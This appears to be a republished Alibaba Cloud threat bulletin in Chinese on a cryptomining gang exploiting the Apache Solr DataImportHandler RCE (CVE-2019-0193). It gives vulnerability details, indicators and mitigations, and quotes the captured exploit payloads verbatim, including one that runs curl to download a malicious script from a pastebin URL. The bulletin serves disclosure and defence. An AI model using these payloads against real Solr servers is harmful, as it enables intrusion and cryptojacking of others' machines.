威脅快報|Solr dataimport成挖礦團伙新型利用方式

時間  2019-11-24
標籤 威脅 快報 solr dataimport 團伙 新型 利用 方式 简体版
原文   原文鏈接

概述

近日,阿里雲安全團隊監測到挖礦團伙利用solr dataimport RCE(CVE-2019-0193)做爲新的攻擊方式對雲上主機進行攻擊,攻擊成功後下載門羅幣挖礦程序進行牟利。該團伙使用的惡意腳本與以前報道的「威脅預警 | watchbog挖礦蠕蟲升級,利用Bluekeep RDP等多個漏洞蓄勢待發」文章所提團伙使用的基本一致,所以基本認爲是同一團伙所爲。java

除此以外,能夠合理推測,該團伙一直活躍在尋找新的攻擊方式來植入其惡意程序,阿里雲安全團隊已在第一時間對該利用方式進行了監控,並對該團伙的行爲持續關注。建議用戶及時排查自身主機是否受到影響,並關注阿里雲安全團隊的相關文章。數據庫

漏洞詳情

漏洞簡介

Apache Solr是開源企業搜索平臺,主要包括全文搜索、動態聚類、富文本處理等功能。Remote Code Execution via DataImportHandler(CVE-2019-0193)是apache Solr在2019.8.1日披露的漏洞預警,此漏洞發生在Solr的DataImportHandler(DIH)模塊中,該模塊提供從數據庫或其餘數據源獲取數據的能力。因爲Solr admin默認是不須要鑑權認證的,且DIH支持腳本操做,所以能夠經過構造惡意http請求,實現遠程命令執行。apache

以下圖,在solr admin中選擇dataimport選項卡,因爲dataimport配置支持腳本,咱們能夠在配置文件中寫入惡意腳本,執行curl xxx.xxx.xxx.xx指令。json

以下圖,咱們服務端收到了solr發送的http請求,證實RCE成功。安全

利用分析

阿里雲安全團隊近日監測到有攻擊者嘗試利用此漏洞對阿里雲上主機進行入侵。其首先發送http://xx.xx.xx.xx:8983/solr/admin/cores?action=STATUS&wt=json的請求來獲取solr中core的名稱。curl

以後對這些core_name進行遍歷,嘗試向corename/dataimport發送以下payload進而向https://pastebin.com/raw/jjFzjCwx請求惡意腳本。阿里雲

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=<dataConfig>
+<dataSource+type="URLDataSource"/>
+<script><![CDATA[
+++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("curl+-fsSL+https://pastebin.com/raw/jjFzjCwx+-o+/tmp/baby");
+++++++++}
+]]></script>
+<document>
+++<entity+name="stackoverflow"
+++++++++++url="https://stackoverflow.com/feeds/tag/solr"
+++++++++++processor="XPathEntityProcessor"
+++++++++++forEach="/feed"
+++++++++++transformer="script:poc"+/>
+</document>
</dataConfig>&name=dataimport

跟進https://pastebin.com/raw/jjFzjCwx此地址的惡意腳本,發現其與以前的分析的watchdog挖礦程序只有一處不一樣,且爲非關鍵內容,以後的部分能夠參見以前的文章。url

除此以外,還有疑似發送ping命令來收集存在漏洞主機的惡意請求:spa

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=<dataConfig>
  <dataSource type="URLDataSource"/>
  <script>
    <![CDATA[
    function poc(row) {
      var Runtime = Java.type("java.lang.Runtime");
      Runtime.getRuntime().exec("ping -c 1 solr_CVE_2019_0193XfSIcGVY.awvsscan119.autoverify.cn");
      return row;
    }
    ]]></script>
 </dataConfig>

漏洞影響

目前,全網使用solr組件的設備數大約在1.9w臺左右,阿里雲安全團隊建議用戶及時查看自身機器狀態,防止事態進一步擴大。debug

IOC

  1. https://pastebin.com/raw/jjFzjCwx
  2. https://pastebin.com/raw/3FDDiNwW
  3. https://pastebin.com/raw/KJcZ9HLL

影響版本

  1. solr 8.2.0 以前版本(不包含)
  2. 需啓用DataImportHandler模塊
  3. solr 未啓用鑑權認證或採用弱密碼

安全建議

  1. 將solr 升級至8.2.0或更新版本(8.2.0版本以後默認不開啓dataconfig參數支持)
  2. 設置solrconfig.xml->requestHandler->config標籤內內容爲空
  3. 與DIH相關的請求採用白名單過濾

參考文章

[1] 威脅預警 | watchbog挖礦蠕蟲升級,利用Bluekeep RDP等多個漏洞蓄勢待發
[2] CVE-2019-0193 Remote Code Execution via DataImportHandler

 

本文做者:蒼珀

原文連接

本文爲雲棲社區原創內容,未經容許不得轉載。

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程